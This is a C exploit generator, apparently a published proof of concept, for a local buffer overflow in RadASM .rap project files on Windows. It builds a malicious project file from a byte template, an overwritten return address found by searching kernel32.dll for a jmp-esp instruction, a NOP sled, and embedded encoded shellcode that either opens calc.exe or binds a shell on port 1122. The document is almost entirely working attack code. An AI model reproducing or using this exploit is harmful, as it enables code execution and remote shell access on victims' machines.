#include<stdio.h>
#include<windows.h>
#include<getopt.h>
void gen_random(char*,const int);
void print(char*);
unsigned int getFsize(FILE*,char*);
void buildfile(char*);
int make_bindshell(unsigned short);
void help();
void printshell();
DWORD SearchStream(const char *,size_t,const char *,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
DWORD FindRetToEspAddress(VOID);
#define VULNF "ufwew.rap"
#define VER "2.2.1.6"
#define POCNAME "Radasm .rap file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define EIPOFFSET 0xDD
#define NOP "\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90"
#define NUL '\0'
#define CLEAR(x) free(x)
#define WXP_DELTA 0xA67FF;
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
char file[]={ //1534 bytes
0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65,
0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61,
0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D,
0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42,
0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52,
0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A,
0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F,
0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69,
0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57,
0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78,
0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74,
0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46,
0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66,
0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59,
0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A,
0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F,
0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47,
0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77,
0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D,
0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C,
0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77,
0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A,
0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31,
0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37,
0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A,
0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38,
0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58,
0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45,
0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49,
0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33,
0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41,
0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65,
0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79,
0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33,
0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F,
0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67,
0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44,
0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31,
0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30,
0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50,
0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50,
0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67,
0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54,
0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37,
0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43,
0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54,
0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33,
0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50,
0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52,
0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A,
0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B,
0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33,
0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48,
0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76,
0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A,
0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39,
0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34,
0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68,
0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46,
0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56,
0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78,
0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72,
0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49,
0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39,
0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E,
0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61,
0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20,
0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F,
0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44,
0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31,
0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30,
0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34,
0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C,
0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E,
0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70,
0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22,
0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49,
0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45,
0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41,
0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20,
0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F,
0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C,
0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62,
0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58,
0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A,
0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45,
0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E,
0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61,
0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F,
0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65,
0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79,
0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C,
0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
typedef BOOL(WINAPI *PENUMDEVICES)(LPVOID*,DWORD ,LPDWORD);
typedef DWORD(WINAPI *PGETDEVNAME)(LPVOID ImageBase,char *lpBaseName,DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
typedef enum{
True=1,
False=0,
Error=-1
}boolean;
struct{
char* sname;
int sz;
char* shell;
}use[]={
{"calc.exe",338,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"},
{
"Bind port 1122",709,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
},
{NUL,NUL}
};
struct{
unsigned int code;
}usez;
DWORD ret;
int S;
int main(int argc,char* argv[]){
ret=FindRetToEspAddress();//default eip
if(argc<2){
system("cls");
help();
GetNtosDelta();
printshell();
printf("[^]The default retcode is :0x%X",ret);
exit(0);}
printf("[!]%s\n[!]%s\n[!]By %s\n",POCNAME,VER,AUTHOR);
int opt;
while((opt=getopt(argc,argv,"s:t"))!=-1){
switch(opt){
case 's':
S=atoi(optarg);
break;
case 't':
sscanf(argv[4],"%x",&ret);
break;
default:
help();
}}
buildfile(VULNF);
printf("[#]You selected: %s\n",use[S].sname);
print("DONE!");
getchar();
return 0;
}
void buildfile(char* fname){
char buffer[100000];
gen_random(buffer,5000);
memcpy(buffer,file,strlen(file));
memcpy(buffer+292,&ret,4);
memcpy(buffer+312,NOP,10);
memcpy(buffer+322,use[S].shell,strlen(use[S].shell));
printf("[#]Your Retcode is: 0x%X\n",ret);
FILE* f=fopen(fname,"wb");
if(f){
fwrite(buffer,1,1534,f);
fclose(f);
}
else {
print("Error in writing file");
exit(0);
}
free(buffer);
free(file);
int sz=getFsize(f,fname);
printf("[!]File is %d bytes\n",sz);
}
void help()
{ char h[]="************************************************\n"
"*Radasm .rap file local buffer overflow exploit*\n"
"*syntax: [-h<shellcode>] [-t<your target>] *\n"
"* -s shellcode to run 0 or 1 *\n"
"* -t your target *\n"
"* example: radasm.exe -s 0 -t 0xFFFFFFFF *\n"
"* If you want a retcode default from your *\n"
"* memory don't use -t option *\n"
"************************************************\n";
printf("%s",h);}
void printshell()
{ print("We can use:");
int i;
FOR(i,0,2){
printf("[!] %d. %s of size: %d bytes\n",i,use[i].sname,strlen(use[i].shell)); }
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if(GetVersionExA(&osvi))
{ if(osvi.dwMajorVersion==5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval=OS_W2K;
break;
case 1:
retval=OS_WXP;
break;
case 2:
retval=OS_W2K3;
break;
}
}
else if(osvi.dwMajorVersion==6)
{retval=OS_VISTA;
}
}
g_dwOsVersion=retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{ DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
print("System identified as Windows Vista\n");
retval=WVISTA_DELTA;
break;
case OS_W2K:
print("System identified as Windows 2000\n");
retval=W2K_DELTA;
break;
case OS_W2K3:
print("System identified as Windows 2003\n");
retval=W2K3_DELTA;
break;
case OS_WXP:
print("System identified as Windows XP\n");
retval=WXP_DELTA;
break;
default:
print("Unidentified system!\n");
}
return retval;
}
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize)
{unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if(i==(uSubStreamSize-1))
return(uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "\xFF\xD4";
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}
unsigned int getFsize(FILE* g,char* gname)
{unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;}
void print(char* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
